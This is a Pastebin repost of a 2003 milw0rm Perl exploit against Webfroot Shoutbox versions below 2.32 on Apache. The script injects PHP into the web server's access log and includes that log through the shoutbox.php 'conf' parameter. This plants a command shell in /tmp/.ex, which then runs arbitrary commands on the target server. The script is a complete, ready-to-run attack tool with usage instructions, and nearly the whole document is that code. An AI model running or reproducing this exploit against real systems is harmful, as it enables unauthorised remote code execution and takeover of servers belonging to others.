Advertisement
FlyFar

Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution

Jan 24th, 2024
1,154
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 3.01 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2. #
  3. # Webfroot Shoutbox < 2.32 on apache exploit
  4. #
  5.  
  6. use IO::Socket;
  7.  
  8. my $host = "127.0.0.1";
  9. my $port = 80;
  10. my $shoutbox = "shoutbox.php?conf=";
  11. my $shoutboxpath = "/shoutbox";
  12. my $cmd = "ls -l";
  13. my $conn;
  14. my $type;
  15. my @logs = (
  16. "/etc/httpd/logs/acces_log",
  17. "/etc/httpd/logs/acces.log",
  18. "/var/www/logs/access_log",
  19. "/var/www/logs/access.log",
  20. "/usr/local/apache/logs/access_log",
  21. "/usr/local/apache/logs/access.log",
  22. "/var/log/apache/access_log",
  23. "/var/log/apache/access.log",
  24. "/var/log/httpd/access_log",
  25. "/var/log/httpd/access.log",
  26. #"D:/apps/Apache Group/Apache2/logs/access.log"
  27. );
  28.  
  29. my $qinit = "GET /<?\$h=fopen('/tmp/.ex','w+');fwrite(\$h,'Result:<pre><?system(\$cmd);?>
  30. </pre>');fclose(\$h);?> HTTP/1.1\nHost: 127.0.0.1\nConnection: Close\n\n";
  31. my $conn;
  32.  
  33.  
  34. if ($ARGV[0] eq "x" || $ARGV[0] eq "r"){
  35. $type = $ARGV[0];
  36. }
  37. else {
  38. print "[x] Webfroot Shoutbox < 2.32 on apache exploit \n\n";
  39. print "Usage: \n Webfroot.pl (x|r) host [command] [path] [port]\n";
  40. print "\ttype\tx = exploit | r = run command (after run with x option)\n";
  41. print "\thost\thostname\n";
  42. print "\tcommand\tcommand to execute on remote server\n";
  43. print "\tpath\tpath to shoutbox installation ex: /shoutbox\n";
  44. print "\tport\tport number\n";
  45. exit;
  46. }
  47.  
  48. if ($ARGV[1]){
  49. $host = $ARGV[1];
  50. }
  51.  
  52. if ($ARGV[2]){
  53. $cmd = $ARGV[2];
  54. }
  55. if ($ARGV[3]){
  56. $shoutboxpath = $ARGV[3];
  57. }
  58. if ($ARGV[4]){
  59. $port = int($ARGV[4]);
  60. }
  61.  
  62. $cmd =~ s/ /+/g;
  63.  
  64. sub connect_to {
  65. #print "[x] Connect to $host on port $port ...\n";
  66. $conn = IO::Socket::INET->new (
  67. Proto => "tcp",
  68. PeerAddr => "$host",
  69. PeerPort => "$port",
  70. ) or die "[*] Can't connect to $host on port $port ...\n";
  71. $conn-> autoflush(1);
  72. }
  73.  
  74. sub connect_end {
  75. #print "[x] Close connection\n";
  76. close($conn);
  77. }
  78.  
  79. sub exploit {
  80. my $access_log = $_[0];
  81. my $result = "";
  82. $access_log =~ s/ /+/g;
  83. my $query = "GET ${shoutboxpath}/${shoutbox}${access_log} HTTP/1.1\
  84. nHost: $host\nConnection: Close\n\n";
  85. print "$query";
  86. print "[x] Access log : ", $access_log ,"\n";
  87. &connect_to;
  88. print $conn $query;
  89. while ($line = <$conn>) {
  90. $result = $line;
  91. #print $result;
  92. };
  93. &connect_end;
  94.  
  95. }
  96.  
  97. sub run_cmd {
  98. my $conf="/tmp/.ex";
  99. #my $conf="d:/tmp/.ex";
  100. my $result = "";
  101. my $query = "GET ${shoutboxpath}/${shoutbox}${conf}&cmd=$cmd HTTP/1.1\
  102. nHost: $host\nConnection: Close\n\n";
  103.  
  104. print "[x] Run command ...\n";
  105. &connect_to;
  106. print $conn $query;
  107. while ($line = <$conn>) {
  108. $result .= $line;
  109. };
  110. &connect_end;
  111. if ($result =~ /Result:/){
  112. print $result;
  113. } else {
  114. print $result;
  115. print "[*] Failed ...";
  116. }
  117.  
  118. }
  119.  
  120. sub insert_code {
  121. my $result = "";
  122. print "[x] Access log : ", $access_log ,"\n";
  123. print "[x] Insert php code into apache access log ...\n";
  124. &connect_to;
  125. print $conn "$qinit";
  126. while ($line = <$conn>) {
  127. $result .= $line;
  128. };
  129. &connect_end;
  130. print $result;
  131. }
  132.  
  133. if ($type eq "x"){
  134. &insert_code;
  135. print "[x] Trying to exploit ...\n";
  136. for ($i = 0;$i <= $#logs; $i++){
  137. &exploit($logs[$i]);
  138. }
  139. &run_cmd;
  140. } else {
  141. &run_cmd;
  142. }
  143.  
  144.  
  145.  
  146. # milw0rm.com [2003-05-29]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement